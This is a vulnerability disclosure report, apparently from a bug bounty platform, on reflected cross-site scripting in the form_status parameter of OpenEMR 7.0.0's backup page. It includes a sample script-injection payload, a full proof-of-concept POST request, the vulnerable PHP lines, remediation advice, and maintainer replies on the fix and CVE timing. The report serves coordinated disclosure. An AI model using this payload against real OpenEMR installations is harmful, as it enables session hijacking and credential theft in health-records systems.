Reflected Cross Site Scripting in OpenEMR 7.0.0 and below at backup in openemr/openemr
Reported on
Jul 19th 2022
Description
We would like to report the vulnerability we found during software testing. The OpenEMR 7.0.0 (latest version) and below version Open Source electronic health records and medical practice management application has Reflected Cross Site Scripting vulnerability in the {form_status} parameter on backup page that never been reported before (We've checked from CVE Official website).
Vulnerability Type
Reflected Cross Site-Scripting (XSS)
Affected Page/URL
https://<openemrurl>/interface/main/backup.php {form_status}
Sample XSS Payload
' /><script>alert(`CVE_Hunting_XSS`)</script>
Vulnerable Source Code
/var/www/localhost/htdocs/openemr/interface/main/backup.php (Please see more details in the occurrences section)
Implication
This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
Recommendation
Whitelist validation at server side should be performed for all input fields and parameters in the entire application to ensure that only valid input is processed. The validation should decode any encoded input, and then validate the length, characters, format, and any business rules on that data before accepting the input. Special characters such as `’/;&*()%!+{}[]|# including Carriage Return (ASCII 1, \r, %0d) as well as Line Feed (ASCII 10, \n, %0a) should be filtered out prior to server processing form fields and hidden form fields. In case special characters should be allowed into an input field, the application should use a standard function to “escape” the special characters. Alternatively, all parameters returned to the user’s browser should be sanitized so that client-side scripting attacks would not be effective. Output HTML encoding should be properly implemented to prevent execution of malicious script on user’s browser.
Discoverer/Reporters
- Ammarit Thongthua, Rattapon Jitprajong and Nattakit Intarasorn from Secure D Center Research Team
Example PoC Screenshots
OpenEMR Version 6.1.0
OpenEMR Version 7.0.0
Backup Page
Click Create Backup or Create Eventlog Backup then Injected malicious JavaScript Payload in to {form_status} with Sample XSS Payload
POST /interface/main/backup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------134273974110212498243185026588
Content-Length: 626
Origin: https://localhost
Connection: close
Referer: https://localhost/interface/main/backup.php
Cookie: OpenEMR=sDB13cXmxjjPS6d-BF8dtr9D5Kj8PkbOg2oMdxqSKMMo1C7Y
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="csrf_token_form"
4a2e4c79d44d123017f7ff6850e337c8c17557e3
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_backup"
ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_step"
ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_status"
' /><script>alert(`CVE_Hunting_XSS`)</script>
-----------------------------134273974110212498243185026588--
Renderred Malicious JavaScript (XSS)
Impact
This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
Occurrences
backup.php L945
if ($form_step == 203) {
$form_status .= xla('Done') . ".";
echo nl2br($form_status);
}
backup.php L503
if ($form_step == 1) {
$form_status .= xla('Dumping OpenEMR database') . "...<br />";
echo nl2br($form_status);
if (file_exists($TAR_FILE_PATH)) {
if (! unlink($TAR_FILE_PATH)) {
die(xlt("Couldn't remove old backup file:") . " " . text($TAR_FILE_PATH));
}
}
backup.php L1029
<input type='hidden' name='form_status' value='<?php echo $form_status; ?>' />
backup.php L923
if ($form_step == 202) {
// Process uploaded config file.
if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $EXPORT_FILE)) {
$form_status .= xla('Applying') . "...<br />";
echo nl2br($form_status);
$cmd = escapeshellcmd($mysql_cmd) . " -u " . escapeshellarg($sqlconf["login"]) .
" -p" . escapeshellarg($sqlconf["pass"]) .
" -h " . escapeshellarg($sqlconf["host"]) .
" --port=" . escapeshellarg($sqlconf["port"]) .
" $mysql_ssl " .
escapeshellarg($sqlconf["dbase"]) .
" < " . escapeshellarg($EXPORT_FILE);
} else {
echo xlt('Internal error accessing uploaded file!');
$form_step = -1;
}
} else {
echo xlt('Upload failed!');
$form_step = -1;
}
$auto_continue = true;
}
backup.php L549
if ($form_step == 3) {
$form_status .= xla('Dumping OpenEMR web directory tree') . "...<br />";
echo nl2br($form_status);
$cur_dir = getcwd();
chdir($webserver_root);
backup.php L903
if ($form_step == 103) {
$form_status .= xla('Done. Will now send download.') . "<br />";
echo nl2br($form_status);
$auto_continue = true;
}
Thanks for the report. Working on a fix now.
A preliminary fix has been posted in commit 285fb234bd27ea4c46a29f2797edda7f38f1d8db
Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 3-7 weeks. After I do that, then will be ok to make CVE # and make it public.
Thanks!
Just waiting for the go-ahead from the maintainer and then we can assign and publish a CVE for this report 👍
OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.
Dear @Admin, @Jamie Slome Could you please help to assign the CVE for this finding please? Thanks and appreciate for your help 👍
@Brady Miller Thanks for your response 👍
CVE assigned and will automatically publish in the next few hours ♥️






